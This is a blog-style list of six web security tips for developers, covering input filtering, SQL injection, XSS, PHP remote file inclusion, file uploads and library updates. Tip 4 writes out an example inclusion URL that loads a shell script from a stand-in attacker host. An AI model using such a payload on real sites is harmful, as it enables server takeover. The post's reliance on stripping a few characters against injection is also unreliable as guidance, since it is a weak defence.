Almost every day we hear the news of website hacking. In the case of website hacking 70% fault is in the wrong development of the website. And 30% cases are of server errors. For protecting a website from hackers, web developers should follow some security tips for developing a website. For testing of the website for common vulnerabilities, company hire penetration testers But for those companies which can not have enough resource for penetration testers should follow some common steps for website protection. There some common vulnerabilities which are used for website hacking and known to script kiddies too. So protection against these common vulnerabilities can increase the security level of your website’s security level. I am not going in detail of these vulnerabilities. If you want to learn all those in detail, go to this
Hacking tricks.in) (Now I am not managing it). I am going write some security steps which a web developer should follow in website development.
Website Security Tips For Web Developers
1. Don’t trust on user inputs
Never trust on User input. Always check user’s input and filter unwanted characters. which can cause a problem. These are some characters should avoid. ‘ ” ; # ) = are some common characters to be filtered. Read how to validate a form with jQuery and CSS. You can also use HTML5 form validation. But this only works in the modern browsers.
2. Never use Form data or query data directly in SQL Queries
Never use user input or query string data direct in SQL queries. Always filter unwanted characters which can cause errors in query execution. It can cause SQL injection in website. By exploiting this vulnerability, attacker can access your database and even run SQL queries in it. SO, you must take care of this.
3. Filter Html Tags and script tags.
Never allow any user input script to be executed in website. always filter scripting tags and functions in user input. See XSS filter PHP function for Web Developers. This could lead to XSS and attacker can use this to serve malware, hijack session of users and perform unwanted redirects in your website. It will have an impact on the reputation of your website.
4. Use Include or Require carefully
In php if you are using include or require function then take care of this. Attacker can include external files to perform attack on your website.
Suppose you are using it as http://www.website.com/index.php?page=article and in page you are using include(article.php) then take care of execution of external php script on the website such as http://www.website.com/index.php?page=http://www.hacker.com/hackshell.php this is called RFI vulnerability.
5. Validate file uploads properly
When uploading files, validate the file mime type. If you are expecting images, make sure the file you are receiving is an image or it might be a PHP script that can run on your server and does whatever damage you can imagine. So, not just check the file extensions but also validate MIME type. Have a proper mechanism for checking the files before uploading it.
Most of the hackers try to upload shell scripts or backdoors from file uploads. If your file upload is not secure, you are going to have a bad time ahead.
If you want a secure image upload, you can check this project on Github.
6. Always update third party library used in your application
If you are using any 3rd party libraries, always check for security updates for those libraries. Most of the hackers check for outdated libraries used on a website and then use the existing vulnerabilities of that library to perform attack. WordPress hackers check for websites using vulnerable plugins and themes. So, never forget to update your plugins, themes or scripts you are using. Developers push updates with security fixes and new features. Even if you do not want new features, you must update to have security issues resolved.
If you follow these things while creating a web application, you can make your application secure from script kiddies and intermediate level hackers. And these kinds of hackers is those who are most active on Internet.